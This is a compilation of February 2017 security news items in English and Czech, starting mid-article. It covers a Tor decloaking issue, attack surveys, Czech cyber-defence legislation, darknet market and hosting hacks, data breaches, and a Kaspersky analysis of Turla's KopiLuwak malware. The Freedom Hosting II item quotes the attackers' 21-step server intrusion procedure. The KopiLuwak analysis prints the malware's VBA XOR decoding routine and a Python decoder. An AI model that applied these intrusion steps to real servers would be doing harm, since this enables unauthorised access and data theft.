“There are several free DRM providers who could sign your media for you however as the barrier to entry to the DRM market is the aforementioned price tag, it makes you wonder how these files are being signed in the wild!” continues the analysis.
“As these “signed WMV” files do not present any alert to a user before opening them they can be used quite effectively to decloak users of the popular privacy tool TorBrowser with very little warning”, they write.
Experts at the Tor Project are aware of the possibility that hackers track Windows Tor users leveraging on Windows DRM issue. They invite users to run Tails if they need to run media files.
Terčem kyberútoku se loni stala celosvětově pětina firem
6.2.2017 Novinky/Bezpečnost Kyber
Podíl firem, které se ve světě staly terčem kybernetického útoku, se loni zvýšil o šest procentních bodů na 21 procent. Celková odhadovaná škoda za rok 2016 je 279 miliard amerických dolarů (skoro sedm biliónů korun). Nejvíce na vzestupu bylo vydírání. Vyplývá to ze studie Grant Thornton, která zahrnuje informace 10 000 společností z 37 zemí.
V Severní Americe útoky přiznalo 24 procent firem, v EU dokonce 32 procent firem. Průměr stahuje dolů asijsko-pacifický region se 13 procenty napadených firem. Citelný nárůst kyberkriminality se však týká všech regionů.
Nejčastějším primárním důsledkem kyberútoků je zhoršená reputace, kterou uvedlo 29 procent společností, následuje ztráta času a energie, kterou je nutné vynaložit na nápravu vniklých škod. Ztrátu zákazníků označilo jako primární škodu 16 procent společností a sedm procent firem pocítilo přímý pokles obratu.
Vydírání je v kurzu
Nejčastěji se vyskytující formou kyberútoku je poškození obchodní infrastruktury. Tuto variantu přiznalo 22 procent napadených firem. Zkušenost s vydíráním pod pohrůžkou zveřejnění informací, násilí nebo poškození aktiv firmy přiznalo 17 procent společností.
"Vydírání je v paletě finančních zločinů tradičně vnímáno jako velmi nekalá praktika. V online světě je navíc vydírání velmi dobře organizované. Samotným útokem to však nekončí. Organizaci v návaznosti na tento útok vznikají další finanční ztráty vlivem poškozené reputace, zcizení informací, duševního vlastnictví, eventuálně fyzických škod na infrastruktuře," uvedl partner Grant Thornton David Pirner.
Podle expertů z Grant Thornton reagují společnosti na kyberútoky příliš pozdě. Celkem 13 procent firem zjistilo, že se staly oběťmi kyberútoku déle než po týdnu. Čtyři společnosti ze sta dokonce až déle než po měsíci.
Přišlo hacknutí ministerstva zahraničí jako na zavolanou?
6.2.2017 Novinky/Bezpečnost BigBrother
Předkladatelé zákona o Vojenském zpravodajství jsou „na koni“. Je teď přeci evidentní, že ČR potřebuje kybernetickou obranu a že stát se o ni postará nejlépe.
Jak jistě víte, v současnosti je ve sněmovně novela zákona o Vojenském zpravodajství, jež má svěřit obranu (ano, to je rozhodně něco jiného než ochrana) českého kybernetického prostoru Vojenskému zpravodajství (VOZ). Pokud mi dovolíte velké zjednodušení, tak zákon v podstatě říká, že VOZ bude instalovat do sítí operátorů prostředky kybernetické obrany, což jsou technické prostředky vedoucí k předcházení, zastavení nebo odvrácení kybernetického útoku ohrožujícího zajišťování obrany České republiky. Operátoři mají povinnost o připojení prostředků kybernetické obrany pomlčet.
Není divu, že takto vágně formulovaný zákon vzbudil vlnu nevole. Asi nejviditelnějším protestem je prohlášení tří významných asociací – CZ.NIC, ICT Unie a NIX.CZ. Samozřejmě, argumentů proti této novele lze nalézt mnohem více. V tom ovšem přišla zpráva jako hrom, a to, že někdo hacknul mailový server Ministerstva zahraničních věcí ČR, a rázem jsou předkladatelé zákona „na koni“. Je teď přeci evidentní, že Česká republika potřebuje kybernetickou obranu a že stát se o to postará nejlépe. Na toto téma jsem si přečetl i zajímavý rozhovor na Aktualne.cz. Ale je tento bezpečnostní incident skutečně argumentem pro přijetí této novely? Já myslím, že je tomu právě naopak!
Dále čtěte: Útoků na ministerstvo zahraničí si dlouho nikdo nevšiml. Kdo bude dalším cílem?
Ve zmiňovaném rozhovoru ministr (všeobecné) obrany uvádí, že pokud by byl přijat zákon, vojenští zpravodajci by zasahovali. Zní to, jako jasný argument pro urychlené přijetí zákona. Ale já si neustále kladu otázku: „Kdo jim v tom bránil?“. A teď mi prosím promiňte, že budu v následujících řádcích vnímat státní správu jako jeden celek. Nicméně, stát přeci v žádném případě neměl zakázáno starat se o svou vlastní kybernetickou bezpečnost (či obranu, chcete-li). Pokud chce stát dávat zařízení kybernetické obrany do sítí soukromých operátorů, proč je už neinstaloval do svých, státních sítí, aby ukázal, jak prospěšná zařízení to jsou? Proč se stát či konkrétně VOZ nechlubí množstvím odražených útoků v sítích státních úřadů, aby ukázal, že tímto jednoznačně prospěje i soukromé sféře? Není to spíše naopak? Žádný významný soukromý poskytovatel e-mailů neměl v poslední době takto závažný incident. Proč si tedy někdo myslí, že nás stát ochrání a že by měl instalovat prostředky kybernetické obrany v sítích soukromých operátorů? Proč nezačne u sebe? Například může začít na MZV a dalších ministerstvech.
Dále čtěte: Dušan Navrátil (NBÚ): Velké kyberútoky na český stát už probíhají, stojí za nimi jiné země
Mimochodem je velmi zajímavé sledovat, jak se mění argumentace předkladatelů k zákonu v reakci na ono prohlášení asociací. Například i ve zmíněném rozhovoru se hovoří o tom, že zmíněná zařízení kybernetické obrany budou pouze pasivní a jejich vyřazením z provozu tedy nemůže dojít k závažnějším provozním problémům. Ale to je v přímém kontrastu s definicí obsaženou v navrhované novele. Tato definice mluví jasně o technických prostředcích vedoucí k předcházení, zastavení nebo odvrácení kybernetického útoku. Pokud mají být zařízení pouze pro odposlech, proč se v návrhu zákona mluví o zastavení a odvrácení?
Rozhodně podporuji snahu státu o zvýšení kybernetické bezpečnosti svých systémů. Ale nemyslím si, že správným prostředkem je odposlech všech i se stáními systémy nesouvisejících sítí. Pevně věřím, že vše zlé je pro něco dobré. Doufám, že tento podivný návrh zákona nastartuje seriozní debatu o tom, jak zvýšit kybernetickou bezpečnost země a stát upustí od podivných Orwellovských nápadů a začne se vážně zabývat tím, jak zvýšit zabezpečení svých IT systémů.
Darknet Marketplace Hansa Launches Bug Bounty Program
6.2.2017 securityweek Security
The darknet marketplace Hansa announced last week the launch of a bug bounty program with rewards of up to 10 bitcoins, currently worth more than $10,000.
Hansa allows users to buy and sell various types of items, including drugs, fraud-related services, jewelry, counterfeit products, electronics, and IT services. The marketplace is designed to minimize the risk of scams operated by vendors and Hansa administrators, and claims to guarantee that users will not lose their funds in case of a hack or law enforcement operation.
In an effort to minimize the chances of the website getting hacked, Hansa’s owners have decided to launch a bug bounty program. The highest rewards, up to 10 bitcoins, will be paid out for vulnerabilities that could “severely disrupt Hansa’s integrity,” such as flaws that expose IP addresses or user information.
Hansa has promised 1 bitcoin, worth roughly $1,000, for bugs and vulnerabilities that are not critical. Users can also earn 0.05 bitcoins ($50) for reporting simple display bugs or unintended behavior.
“To be eligible, you must demonstrate a security compromise on our market using a reproducible exploit. Should you encounter a bug please open a ticket and inform us about your findings,” Hansa administrators wrote in a Reddit post announcing the bug bounty program.
Users who submit vulnerability or bug reports must not make their findings public before the issue has been fixed, and they must refrain from conducting any tests that could have a negative impact on the website or its users. Hansa has advised users to provide detailed proof-of-concepts (PoCs) to increase their chances of receiving a reward.
Hansa has promised to respond to vulnerability and bug reports as quickly as it can, and provide updates while it works to address the problem.
In the Reddit post announcing the launch of the bug bounty program, two users said they had already submitted reports describing vulnerabilities that could have serious consequences if exploited.
Last month, someone reported finding a vulnerability that exposed the private messages exchanged by users of the popular darknet marketplace AlphaBay. The individual who discovered the security hole claimed to have created a bot that collected more than 200,000 private messages.
The same individual also said he had identified a flaw in the Hansa marketplace, which allegedly allowed him to obtain 240,000 Hansa usernames.
The Slammer worm is back after 13 years to target ancient SQL servers
6.2.2017 securityaffairs Virus
The SQL Slammer worm, one of the most long-lived malware, now seems to be back online to compromise ancient SQL servers worldwide.
SQL Slammer is probably one of the most long-lived threats, it first appeared 14 years ago and now it is back to compromise ancient SQL servers.
SQL Slammer exploits an ancient flaw in Microsoft SQL server and Desktop Engine causing a denial of service, it was 2003 when the security researcher Michael Bacarella raised the alarm to SlammerSlammer and the worm caused a denial of service condition on tens of thousands of systems around the world.
The researcher noticed a “massive packet loss to various points on the globe” caused by a worm affecting MS SQL Server which was pingflooding addresses at some random sequence.
The worm is able to exploits a buffer overflow vulnerability in Microsoft SQL Server 2000 or MSDE 2000 by sending a formatted request to UDP port 1434.
After the worm infects a server, it attempts to spread rapidly by sending the same payload to random IP addresses, causing a denial of service condition on the victim’s machine.
SQL Slammer was created starting from a proof-of-concept exploit code published during Black Hat by now the Google security researcher David Litchfield.
The Slammer Worm was using a SQL Server Resolution service buffer overflow flaw, discovered by NGSSoftware, and patched by MS in July 2013.
Now researchers at Check Point researchers confirmed that the threat has risen in early December (between 28 November, 2016, and 4 December, 2016), it mostly targeted machines in the US.
“During a routine analysis of global data collected by Check Point ThreatCloud, we detected a massive increase in the number of attack attempts between November 28 and December 4, 2016, making the SQL Slammer worm one of the top malware detected in this timeframe:” reads the analysis published by Check Point.
“The attack attempts detected by Check Point were directed to a large variety of destination countries (172 countries in total), with 26% of the attacks being towards networks in the United States. This indicates a wide wave of attacks rather than a targeted one.”
The researchers noticed that the largest volume of traffic associated with the Slammer Worm was originated from IP addresses in China, Vietnam, and Mexico.
This is absurd because it seems that the worm targeted a now-ancient SQL Server 2000 buffer overflow vulnerability that DB administrators still haven’t fixed after more than 13 years.
“To summarize, although the Slammer worm was primarily spread during 2003, and has barely been observed in the wild over the last decade, the massive spike in propagation attempts that was observed in our data leads us to wonder – is the worm trying to make a comeback?” states the report.
Windows SMB Zero-Day Exploit Released in the Wild after Microsoft delayed the Patch
6.2.2017 thehackernews Vulnerebility
Last weekend a security researcher publically disclosed a zero-day vulnerability in Windows 10, Windows 8.1 and Server editions after Microsoft failed to patch it in the past three months.
The zero-day memory corruption flaw resides in the implementation of the SMB (server message block) network file sharing protocol that could allow a remote, unauthenticated attacker to crash systems with denial of service attack, which would then open them to more possible attacks.
According to US-CERT, the vulnerability could also be exploited to execute arbitrary code with Windows kernel privileges on vulnerable systems, but this has not been confirmed right now by Microsoft.
Without revealing the actual scope of the vulnerability and the kind of threat the exploit poses, Microsoft has just downplayed the severity of the issue, saying:
"Windows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. We recommend customers use Windows 10 and the Microsoft Edge browser for the best protection."
However, the proof-of-concept exploit code, Win10.py, has already been released publicly for Windows 10 by security researcher Laurent Gaffie and does not require targets to use a browser.
The memory corruption flaw resides in the manner in which Windows handles SMB traffic that could be exploited by attackers; all they need is tricking victims to connect to a malicious SMB server, which could be easily done using clever social engineering tricks.
"In particular, Windows fails to properly handle a server response that contains too many bytes following the structure defined in the SMB2 TREE_CONNECT Response structure," CERT said in the advisory.
"By connecting to a malicious SMB server, a vulnerable Windows client system may crash (BSOD) in mrxsmb20.sys."
Since the exploit code is now publicly available to everyone and there is no official patch from Microsoft, all Windows users are left open to potential attacks at this time.
Until Microsoft patches the memory corruption flaw (most probably in the upcoming Windows update or out-of-band patch), Windows users can temporarily fix the issue by blocking outbound SMB connections (TCP ports 139 and 445 and UDP ports 137 and 138) from the local network to the WAN.
The vulnerability has been given Common Vulnerability Scoring System (CVSS) score of 7.8. Proof-of-concept code has been published on GitHub.
New York Man Admits to Role in Cybercrime Operation
6.2.2017 securityweek Cyber
Vyacheslav Khaimov, a 55-year-old man from Brooklyn, New York, has admitted taking part in an international cybercrime scheme and pleaded guilty to operating an unlicensed money transmitting business.
Khaimov was initially charged with conspiracy to commit wire and bank fraud, wire fraud, bank fraud, money laundering conspiracy, and money laundering.
According to authorities, cybercriminals used “sophisticated malware” to gain access to bank accounts, mostly belonging to people in the United States. The funds stolen from these accounts were wired to money mules in the U.S., who sent it to other intermediaries in the country, including Khaimov, or directly overseas.
The FBI determined that Khaimov, who had been using the alias “Samuel Gold,” received tens of thousands of dollars on numerous occasions from other mules, and forwarded the money to overseas co-conspirators, including to accounts in Thailand and various companies operated by these co-conspirators.
Investigators said Khaimov and a company he owned received more than $230,000 taken from the accounts of at least eight victims. Authorities believe the man was involved in fraudulent wire transfers pertaining to at least 20 victims.
The FBI has identified more than 20 money mules and over 30 victims. The cybercrime operation caused over $1.2 million in losses, but the fraudsters attempted to steal more than $6 million.
The FBI’s investigation into this scheme is ongoing and the agency says it’s determined to bring all co-conspirators to justice – court documents show there are at least four.
SCADA Honeywell XL Web II Controller exposed password in clear text
6.2.2017 securityaffairs Incindent
The web-based SCADA system Honeywell XL Web II Controller is affected by multiple flaws that can be remotely exploited to expose passwords in clear text.
A popular web-based SCADA system designed by Honeywell is affected by multiple vulnerabilities that can be remotely exploited to expose passwords in clear text.
In order to access the password in clear text, the attacker just has to access a particular URL to trigger one of the flaws.
The vulnerabilities affect some versions of Honeywell XL Web II controllers, a system that is widely adopted in critical infrastructure across various industries, including energy, wastewater, and manufacturing.
According to the ICS-CERT security advisory, the majority of the affected products is located in Europe and the Middle East.
The Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) issued a security advisory to warn of the flaws.
“Independent researcher Maxim Rupp has identified vulnerabilities in Honeywell’s XL Web II controller application.” reads the security advisory. “An attacker may use these vulnerabilities to expose a password by accessing a specific URL. The XL Web II controller application effectively becomes an entry point into the network where it is located.”
Follow
ICS-CERT @ICSCERT
ICS-CERT issued advisory ICSA-17-033-01 Honeywell XL Web II Controller Vulnerabilities to ICS-CERT web site http://go.usa.gov/x9Hqg
6:13 PM - 2 Feb 2017
19 19 Retweets 5 5 likes
Follow
Maxim Rupp @mmrupp
#Honeywell XL1000C500 XLWebExe-2-01-00 and prior + XLWeb 500 XLWebExe-1-02-08 and prior.
Coming soon. #ICS #Advisory
8:24 PM - 6 Jan 2017
1 1 Retweet 2 2 likes
The affected products are the Honeywell XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior.
Honeywell has produced a new version (version 3.04.05.05) to address the vulnerabilities, in order to receive the security updates customers have to contact their local Honeywell Building Solutions branch.
The attacker can also exploit other flaws in the Honeywell XL Web II controllers, he can carry out a path traversal attack by accessing a specific URL, open and change some parameters by accessing a particular URL, or establish a new user session.
The researcher Maxim Rupp that discovered the flaws has detailed them in a blog post recently published.
Anonymous Hacker took down over 10,000 Dark Web Sites; Leaked User Database
5.2.2017 thehackernews Hacking
Dark Web is right now going through a very rough time.
Just two days ago, a hacker group affiliated with Anonymous broke into the servers of Freedom Hosting II and took down more than 10,000 Tor-based .onion dark websites with an alarming announcement to its visitors, which said:
"Hello, Freedom Hosting II, you have been hacked."
Freedom Hosting II is the single largest host of underground websites accessible only through Tor anonymising browser that hosts somewhere between 15 and 20 percent of all sites on the Dark Web, anonymity and privacy researcher Sarah Jamie Lewis estimated.
Besides defacing all Dark Web sites hosted on Freedom Hosting II with the same message and stealing its database, the hackers also demanded a ransom for 0.1 Bitcoin (just over $100) to return the compromised data to the hosting service.
Now, it has been reported that the stolen database from Freedom Hosting II has publicly been released online to a site hosted on the Tor network, which includes the email details of nearly 381,000 users, 'Have I Been Pwned' tweeted.
According to the Anonymous hackers, more than 50 percent of all files hosted on Freedom Hosting II servers were related to child pornography.
Those illegal websites were using gigabytes of data when Freedom Hosting II officially allows no more than 256MB per site, the Anonymous hacker claimed.
In addition to dark sites user details, the data dump also contains backups of website database, most of which are based on popular, free, open source content management systems and forums like WordPress and PHPBB.
In an interview with Motherboard, an Anonymous hacker who claimed responsibility for the hack said this was his first hack ever, and he never intended to take down the hosting provider.
But when he allegedly discovered several large child pornography websites using more than Freedom Hosting II's stated allowance, he decided to take down the service. The hacker claimed to have downloaded 74GB of files and a users database dump of 2.3GB.
Lewis has been analyzing the leaked data and reported that the database contains Dark Web users' numerous plain text emails, usernames, and hashed passwords from forum websites hosted by Freedom Hosting II.
While it's bad news for users who joined one of those forums providing their genuine personal details, law enforcement would be happy, as in a separate case, the FBI used location-tracking malware to infiltrate Dark Web porn sites and track individual users.
Anonymous hacked Freedom Hosting II, a fifth of the Dark Web is down
5.2.2017 securityaffairs Hacking
The group of hacktivists Anonymous hacked the popular Freedom Hosting II Dark Web hosting provider, a fifth of the .onion websites is down.
The collective Anonymous is back, this time the hacker groups breached Freedom Hosting II, a popular Dark Web hosting provider.
After the closure of the original Freedom Hosting, Freedom Hosting II (FHII) become one of the largest onion web hosting providers, it is offering free space to any user who signs up for an account.
Anonymous targeted the popular Tor hosting provider because it was providing its services to a large number of websites sharing child pornography image.
The cyber attack was first spotted by Sarah Jamie Lewis, a privacy researcher at mascherari.press, who noticed the mass defacement during a regular scan of the Tor network.
Follow
Sarah Jamie Lewis @SarahJamieLewis
Looks like Freedom Hosting II got pwned. They hosted close to 20% of all dark web sites (previous @OnionScan report) https://mascherari.press/onionscan-report-september-2016-uptime-downtime-and-freedom-hosting-ii/ …
4:10 PM - 3 Feb 2017
Photo published for OnionScan Report: September 2016 - Uptime, Downtime and Freedom Hosting II
OnionScan Report: September 2016 - Uptime, Downtime and Freedom Hosting II
In this report we will examine how a single hosting provider has had a dramatic affect on the dark web.
mascherari.press
85 85 Retweets 57 57 likes
Since OnionScan started in April, Sarah Jamie Lewis and her team have observed FHII hosting between 1500 and 2000 services or about 15-20% of the total number of active sites in our scanning lists (data related to the last report published in October).
Back to the present, 10,613 .onion sites have taken down as a result of the Freedom Hosting II hack, all sites have been defaced with the following image. As you can see, the Anonymous message also includes a list of hacked websites.
Source Bleepingcomputer.com
Below the message published by Anonymous
“Hello Freedom Hosting II, you have been hacked
We are disappointed… This is an excerpt from your front page ‘We have a zero tolerance policy to child pornography.’ – but what we found while searching through your server is more than 50% child porn…
Moreover you host many scam sites, some of which are evidently run by yourself to cover hosting expenses.
All your files have been copied and your database has been dumped. (74GB of files and 2.3GB of database)
Up to January 31st you were hosting 10613 sites. Private keys are included in the dump. Show full list
We are Anonymous. We do not forgive. We do not forget. You should have expected us.
Thanks for your patience, you don’t have to buy data 😉 we made a torrent of the database dump download here
Here another torrernt with all system files (excluding user data) download
You may still donate BTC to 14iCDyeCSp12AmhVfJGxtrzXDabFop4QtU and support us.
If you need to get in contact with us, our mail is fhosting@sigaint.org
We repeatedly get asked how we got into the system. It was surprisingly easy. Here is how we did it: HOW TO HACK FH2“
According to The Verge, Anonymous attempted to offer for sale the compromised data back to Freedom Hosting II in exchange for 0.1 bitcoin (roughly $100).
Further analysis revealed that the attackers received at least two payments in their Bitcoin wallet, but they opted to publicly leak the data dump via torrent files.
Watch out, the 2.3 GB dump may contain disturbing images, don’t download the archive if you don’t need it. Anonymous claims to have downloaded 74GB of files.
Joseph cox from Motherboard interviewed one of the Anonymous hackers involved in the attack who explained this was his first hack ever, and he did not plan to take down all websites hosted on Freedom Hosting II.
“On Saturday, the hacker claiming responsibility told me in more detail how and why they took down the service.” wrote Cox.
“This is in fact my first hack ever,” they said in an email sent from the same address posted to the hacked Freedom Hosting II sites. “I just had the right idea.”
The hacker, who first compromised the service on January 30, told Vice that they found ten child pornography sites that had uploaded so much content that it accounted for nearly half of the total Freedom Hosting II files.
The security expert Chris Monteiro who analyzed some of the dumped data confirmed that archive includes .onion URLs hosting botnets, fraud sites, fetish websites hacked data, and of course child abuse websites.
The archive is full of private keys related to the dark web sites that could be used to impersonate them.
Follow
Deku_shrub @Deku_shrub
It's hungry work combing through these leaked databases
8:09 PM - 3 Feb 2017
Retweets 4 4 likes
Follow
Deku_shrub @Deku_shrub
Did you know you can access the WWE from the hacked accounts on the darknet? Am disappointed at the lack of John Cena references
10:40 PM - 3 Feb 2017
1 1 Retweet 2 2 likes
Follow
Deku_shrub @Deku_shrub
Looks like some botnets will have been knocked out in the Freedom Hosting II hack too
7:56 PM - 3 Feb 2017
4 4 Retweets 8 8 likes
Below the step-by-step procedure followed by Anonymous to hack Freedom Hosting II.
1. create a new site or login to an old one
2. login and set sftp password
3. login via sftp and create a symlink to /
4. disable DirectoryIndex in .htaccess
5. enable mod_autoindex in .htaccess
6. disable php engine in .htaccess
7. add text/plain type for .php files in .htaccess
8. have fun browsing files
9. find /home/fhosting
10. look at the content of the index.php file in /home/fhosting/www/
11. find configuration in /home/fhosting/www/_lbs/config.php
12. copy paste database connection details to phpmyadmin login
13. find active users with shell access in /etc/passwd
14. look through the scripts and figure out how password resets work
15. manually trigger a sftp password reset for the user 'user'
16. connect via ssh
17. run 'sudo -i'
18. edit ssh config in /etc/ssh/sshd_config to allow root login
19. run 'passwd' to set root password
20. reconnect via ssh as root
21. enjoy
Stay Tuned.
adrotate banner=”9″]
12 InterContinental Hotels Group properties suffered a massive data breach
5.2.2017 securityaffairs Incindent
Hackers compromised payment systems at 12 US properties of the InterContinental Hotels Group and stolen card data with a malware.
The hospitality giant InterContinental Hotels Group (IHG) has confirmed that payment systems of 12 US hotels were victims of a massive data breach. Just a month ago the company InterContinental Hotels Group (IHG) confirmed an ongoing investigation of alleged card breach at some of its properties.
The InterContinental Hotels Group (IHG) informed its customers that payment cards used between August and December 2016, at restaurants and bars of the 12 US hotels were affected by the data breach. The affected properties include the InterContinental San Francisco and Holiday Inn Resort – Aruba, the InterContinental Chicago Magnificent Mile.
The hackers used a malware to infect payment systems and steal card data, including cardholders’ name, card number, expiration date, and internal verification code.
“IHG hired leading cyber security firms to examine the payment card processing systems for the hotels that it manages in the Americas region. Based on the investigation, IHG is providing notification to guests who used their payment card at restaurants and bars of 12 company managed properties during the time periods from August 2016 – December 2016. An investigation of other properties in the Americas region is ongoing.” reads the official announcement published by the company.
The hospitality giant confirmed that the malicious code used by crooks did not affect payment cards used at the front desk.
“Findings show that malware was installed on servers that processed payment cards used at restaurants and bars of 12 IHG managed properties. Cards used at the front desk of these properties were not affected.” continued the statement from the company.
The InterContinental Hotels Group reported the security breach to the law enforcement and is collaborating with the payment card networks to allow banks monitoring for fraudulent transactions.
At the time I was writing there is no news regarding the number of affected customers.
IHG established a dedicated call center to answer any questions of the guests, for additional information about the security breach it is possible to visit the following website:
www.ihg.com/protectingourguests.
PoliceOne hacked – Hacker is selling thousands police officials’ accounts
5.2.2017 securityaffairs Hacking
PoliceOne, a forum used only by only verified law enforcement officials, has been hacked and data dump was offered for sale in a dark web market.
A hacker has stolen over 700,000 user accounts the from a popular law enforcement forum PoliceOne and is offering for sale the entire database.
The PoliceOne forum is used by verified police officers and investigators to exchange information on techniques of investigation, training or other law enforcement centric discussions.
“PoliceOne.com is the #1 resource for up-to-the-minute law enforcement information online. More than 500,000 police professionals nationwide are registered PoliceOne members and trust us to provide them with the most timely, accurate and useful information available anywhere.” reads the description of the website.
The news was reported by Motherboard, the precious data was offered for sale by a hacker that goes online with the moniker of the Berkut.
“We have confirmed the credibility of a purported breach of the PoliceOne forums in 2015 in which hackers were potentially able to obtain usernames, emails and hashed passwords for a portion of our members. While we have not yet verified the claim, we are taking immediate steps to secure user accounts and our forums, which are currently offline while we investigate and gather more information,” a spokesperson for PoliceOne told Motherboard in an email.
“While we store only limited user data and no payment information, we take any breach of data extremely seriously and are working aggressively to resolve the matter. We will be notifying potentially-affected users as a matter of priority and requiring them to change their passwords,” he added.
“Emails from NSA, DHS, FBI and other law enforcement agencies as well as other US government agencies,” Berkut’s listing on the Tochka dark web market reads.
Berkut is selling the full database which includes around 715,000 user accounts and dates from 2015, for $400. He used the Tochka dark web market to sell the data dump that contains emails from the main US intelligence agencies (NSA, DHS, FBI), the hacker also confirmed that he had already sold the archive also on other forums.
Berkut provided Motherboard as proof of the hack several samples of the data, including user details (i.e. usernames, email addresses, subscription dates, MD5 hashed passwords). However, the passwords also included salts—random strings of characters used to make a hash more resilient.
Let me remind you that MD5 hashed passwords are very easy to hack.
“The files did indeed contain valid email addresses from the NSA and other US government agencies; one file allegedly contained over 3,000 account details for Homeland Security staffers.” reported the Motherboard.
“To verify that emails in the dump were connected to real accounts on PoliceOne, Motherboard attempted to create new users with a random selection of email addresses. Out of 15 addresses, 14 were already registered on the site.”
How did Bekrut hack the PoliceOne website?
The PoliceOne was running on a flawed version of the popular vBulletin CMS (likely version 4.2.3), it was quite easy for the hacker to find an exploit online and breach it.
KopiLuwak: A New JavaScript Payload from Turla
4.2.2017 Kaspersky Virus
On 28 January 2017, John Lambert of Microsoft (@JohnLaTwC) tweeted about a malicious document that dropped a “very interesting .JS backdoor“. Since the end of November 2016, Kaspersky Lab has observed Turla using this new JavaScript payload and specific macro variant. This is a technique we’ve observed before with Turla’s ICEDCOFFEE payloads, detailed in a private report from June 2016 (available to customers of Kaspersky APT Intelligence Services). While the delivery method is somewhat similar to ICEDCOFFEE, the JavaScript differs greatly and appears to have been created mainly to avoid detection.
Targeting for this new malware is consistent with previous campaigns conducted by Turla, focusing on foreign ministries and other governmental organizations throughout Europe. Popularity of the malware, however, is much lower than ICEDCOFFEE, with victim organizations numbering in the single digits as of January 2017. We assess with high confidence this new JavaScript will be used more heavily in the future as a stage 1 delivery mechanism and victim profiler.
The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the actors to run arbitrary commands via Wscript.
Actor Profile
Turla, also known as Snake / Uroburos / Venomous Bear and KRYPTON is a Russian-speaking APT group that has been active since at least 2007. Its activity can be traced to many high-profile incidents, including the 2008 attack against the US Central Command, (see Buckshot Yankee incident) or more recently, the attack against RUAG, a Swiss military contractor. The Turla group has been known as an agile, very dynamic and innovative APT, leveraging many different families of malware, satellite-based command and control servers and malware for non-Windows OSes.
Targeting Ukraine, EU-related institutions, governments of EU countries, Ministries of Foreign Affairs globally, media companies and possibly corruption related targets in Russia, the group intensified their activity in 2014, which we described in our paper Epic Turla. During 2015 and 2016 the group diversified their activities, switching from the Epic Turla waterhole framework to the Gloog Turla framework, which is still active. They also expanded their spear phishing activities with the Skipper / WhiteAtlas attacks, which leveraged new malware. Recently, the group has intensified their satellite-based C&C registrations ten-fold compared to their 2015 average.
Technical Details
Sample MD5: 6e7991f93c53a58ba63a602b277e07f7
Name: National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc
Author: user
LastModifiedBy: John
CreateDate: 2016:11:16 21:58:00
ModifyDate: 2016:11:24 17:42:00
KopiLuwak: A New JavaScript Payload from Turla
The lure document above shows an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs (MoFA) in Cyprus. Based on the name of the document (National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc, it is presumed it may have been sent from the Qatar Ambassador’s secretary to the MoFA, possibly indicating Turla already had control of at least one system within Qatar’s diplomatic network.
The document contains a malicious macro, very similar to previous macros used by Turla in the past to deliver Wipbot, Skipper, and ICEDCOFFEE. However, the macro did contain a few modifications to it, mainly the XOR routine used to decode the initial JavaScript and the use of a “marker” string to find the embedded payload in the document.
New XOR Routine
Below is a snippet of the new XOR routine used to decode the initial JavaScript payload. Turla has consistently changed the values used in this routine over the last year, presumably to avoid easy detection:
Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
Dim THQNfU76nlSbtJ5nX8LY6 As Byte
THQNfU76nlSbtJ5nX8LY6 = 45
For i = 0 To M5wI32R3VF2g5B21EK4d – 1
EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
Next i
Q7JOhn5pIl648L6V43V = True
End Function
1
2
3
4
5
6
7
8
9
Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
Dim THQNfU76nlSbtJ5nX8LY6 As Byte
THQNfU76nlSbtJ5nX8LY6 = 45
For i = 0 To M5wI32R3VF2g5B21EK4d – 1
EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
Next i
Q7JOhn5pIl648L6V43V = True
End Function
Here is a function written in Python to assist in decoding of the initial payload:
def decode(payload, length):
varbyte = 45
i = 0
for byte in payload:
payload[i] = byte ^ varbyte
varbyte = ((varbyte ^ 99) ^ (i % 254))
i += 1
1
2
3
4
5
6
7
def decode(payload, length):
varbyte = 45
i = 0
for byte in payload:
payload[i] = byte ^ varbyte
varbyte = ((varbyte ^ 99) ^ (i % 254))
i += 1
Payload Offset
Another change in the macro is the use of a “marker” string to find the payload offset in the document. Instead of using hard coded offsets at the end of the document as in ICEDCOFFEE, the macro uses the below snippet to identify the start of the payload:
Set VUy5oj112fLw51h6S = CreateObject(“vbscript.regexp”)
VUy5oj112fLw51h6S.Pattern = “MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh”
Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
1
2
3
Set VUy5oj112fLw51h6S = CreateObject(“vbscript.regexp”)
VUy5oj112fLw51h6S.Pattern = “MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh”
Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
Second Layer JavaScript
Once the marker is found, the macro will carve out “15387 + 1” bytes (hard coded) from the end of the marker and pass that byte array to the aforementioned decoding routine. The end result is a JavaScript file (mailform.js – MD5: 05d07279ed123b3a9170fa2c540d2919) written to “%APPDATA%\Microsoft\Windows\”.
mailform.js – malicious obfuscated JavaScript payload
This file is then executed using Wscript.Shell.Run() with a parameter of “NPEfpRZ4aqnh1YuGwQd0”. This parameter is an RC4 key used in the next iteration of decoding detailed below.
